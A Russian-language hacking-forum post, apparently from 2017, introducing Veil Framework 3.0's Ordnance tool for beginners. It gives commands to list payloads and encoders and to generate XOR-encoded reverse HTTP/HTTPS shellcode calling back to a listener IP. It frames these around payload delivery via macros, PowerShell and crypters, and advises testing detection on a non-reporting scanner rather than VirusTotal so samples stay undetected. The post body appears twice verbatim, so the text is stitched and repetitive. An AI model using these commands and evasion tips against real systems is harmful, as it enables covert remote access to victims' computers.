adm2
20.11.2017, 13:23
Установка (https://forum.antichat.xyz/threads/560978/)
Часть первая. Veil Ordnance (https://forum.antichat.xyz/threads/561192/)
Часть вторая. Veil Evasion (https://forum.antichat.xyz/threads/561256/)
Взлом удаленного компьютера. Veil-Evasion. Metasploit (https://forum.antichat.xyz/threads/557819/)
Veil Evasion как вы знаете обновился до третьей версии давненько (9 месяцев назад, если быть точнее).
Однако более менее подробного осмотра продукта не нашёл. А если, чего то нет, то разбирайся и создавай сам. Тем более что для начинающих Veil достаточно любопытный инструмент, который задействует в себе сразу несколько компонентов для доставки полезной нагрузки: тут тебе и макросы, и повершелл скрипты, и батники, и крипторы.
Главное на VIRUSTOTAL не грузите ничего, ПАЖАЛУСТА! Если и хотите проверить файл на детект, либо поставьте себе бесплатный какой-нибудь AV (самый простой вариант Avast), либо воспользуйтесь сервисом https://nodistribute.com/, или скомбинируйте и то и то)
Установку достаточно подробно разобрал товарищ @Vander (https://forum.antichat.xyz/members/566083/)
https://codeby.net/threads/veil-framework.60978/ (https://forum.antichat.xyz/threads/560978/)
Окунёмся в функционал:
Veil 3.0 состоит из двух инструментов Ordnance и Evasion, которые можно использовать либо вдумчиво через меню программы, либо быстрыми, как правило, заранее заготовленными командами.
Стандартное меню выглядит следующим образом
Код:
./Veil.py
https://forum.antichat.xyz/attachments/4789579/1.png
Вызываем помощь при использовании инструмента в терминале
Код:
./Veil.py -h
https://forum.antichat.xyz/attachments/4789579/2.png
Veil Ordnance
Ordnance используется для быстрого создания шеллкода, который уже в дальнейшем можно использовать для эксплоитов или полезных нагрузок.
-Получаем список доступных нагрузок для инструмента Ordnance
Код:
./Veil.py -t Ordnance --list-payloads
https://forum.antichat.xyz/attachments/4789579/3.png
-Список достпных енкодеров
Код:
./Veil.py -t Ordnance --list-encoders
https://forum.antichat.xyz/attachments/4789579/4.png
-Используем Ordnance для генерации обратной полезной нагрузки https, которая соединяется с 192.168.0.1 на 4443 порту
Код:
./Veil.py -t Ordnance --ordnance-payload rev_https --ip 192.168.0.1 --port 4443
https://forum.antichat.xyz/attachments/4789579/5.png
-Используем Ordnance для генерации обратной полезной нагрузки http, которая соединяется с 192.168.0.1 на 8080 порту, затем применяется xor енкодер (-e xor) и удаляются плохие символы (-b \\x00\\x0a)
Код:
./Veil.py -t Ordnance --ordnance-payload rev_http --ip 192.168.0.1 --port 8080 -e xor -b \\x00\\x0a
https://forum.antichat.xyz/attachments/4789579/6.png
Чтобы шелкод смог выполнить своё предназначение его необходимо скомпилировать либо с использованием второго инструмента Evasion, либо сторонним софтом.
Ну и гифку закину по использованию через меню самой программы
Про Evasion в след. части .
Спасибо за внимание.
Установка (https://forum.antichat.xyz/threads/560978/)
Часть первая. Veil Ordnance (https://forum.antichat.xyz/threads/561192/)
Часть вторая. Veil Evasion (https://forum.antichat.xyz/threads/561256/)
Взлом удаленного компьютера. Veil-Evasion. Metasploit (https://forum.antichat.xyz/threads/557819/)
Часть первая. Veil Ordnance (https://forum.antichat.xyz/threads/561192/)
Часть вторая. Veil Evasion (https://forum.antichat.xyz/threads/561256/)
Взлом удаленного компьютера. Veil-Evasion. Metasploit (https://forum.antichat.xyz/threads/557819/)
Veil Evasion как вы знаете обновился до третьей версии давненько (9 месяцев назад, если быть точнее).
Однако более менее подробного осмотра продукта не нашёл. А если, чего то нет, то разбирайся и создавай сам. Тем более что для начинающих Veil достаточно любопытный инструмент, который задействует в себе сразу несколько компонентов для доставки полезной нагрузки: тут тебе и макросы, и повершелл скрипты, и батники, и крипторы.
Главное на VIRUSTOTAL не грузите ничего, ПАЖАЛУСТА! Если и хотите проверить файл на детект, либо поставьте себе бесплатный какой-нибудь AV (самый простой вариант Avast), либо воспользуйтесь сервисом https://nodistribute.com/, или скомбинируйте и то и то)
Установку достаточно подробно разобрал товарищ @Vander (https://forum.antichat.xyz/members/566083/)
https://codeby.net/threads/veil-framework.60978/ (https://forum.antichat.xyz/threads/560978/)
Окунёмся в функционал:
Veil 3.0 состоит из двух инструментов Ordnance и Evasion, которые можно использовать либо вдумчиво через меню программы, либо быстрыми, как правило, заранее заготовленными командами.
Стандартное меню выглядит следующим образом
Код:
./Veil.py
https://forum.antichat.xyz/attachments/4789579/1.png
Вызываем помощь при использовании инструмента в терминале
Код:
./Veil.py -h
https://forum.antichat.xyz/attachments/4789579/2.png
Veil Ordnance
Ordnance используется для быстрого создания шеллкода, который уже в дальнейшем можно использовать для эксплоитов или полезных нагрузок.
-Получаем список доступных нагрузок для инструмента Ordnance
Код:
./Veil.py -t Ordnance --list-payloads
https://forum.antichat.xyz/attachments/4789579/3.png
-Список достпных енкодеров
Код:
./Veil.py -t Ordnance --list-encoders
https://forum.antichat.xyz/attachments/4789579/4.png
-Используем Ordnance для генерации обратной полезной нагрузки https, которая соединяется с 192.168.0.1 на 4443 порту
Код:
./Veil.py -t Ordnance --ordnance-payload rev_https --ip 192.168.0.1 --port 4443
https://forum.antichat.xyz/attachments/4789579/5.png
-Используем Ordnance для генерации обратной полезной нагрузки http, которая соединяется с 192.168.0.1 на 8080 порту, затем применяется xor енкодер (-e xor) и удаляются плохие символы (-b \\x00\\x0a)
Код:
./Veil.py -t Ordnance --ordnance-payload rev_http --ip 192.168.0.1 --port 8080 -e xor -b \\x00\\x0a
https://forum.antichat.xyz/attachments/4789579/6.png
Чтобы шелкод смог выполнить своё предназначение его необходимо скомпилировать либо с использованием второго инструмента Evasion, либо сторонним софтом.
Ну и гифку закину по использованию через меню самой программы
Про Evasion в след. части .
Спасибо за внимание.
Установка (https://forum.antichat.xyz/threads/560978/)
Часть первая. Veil Ordnance (https://forum.antichat.xyz/threads/561192/)
Часть вторая. Veil Evasion (https://forum.antichat.xyz/threads/561256/)
Взлом удаленного компьютера. Veil-Evasion. Metasploit (https://forum.antichat.xyz/threads/557819/)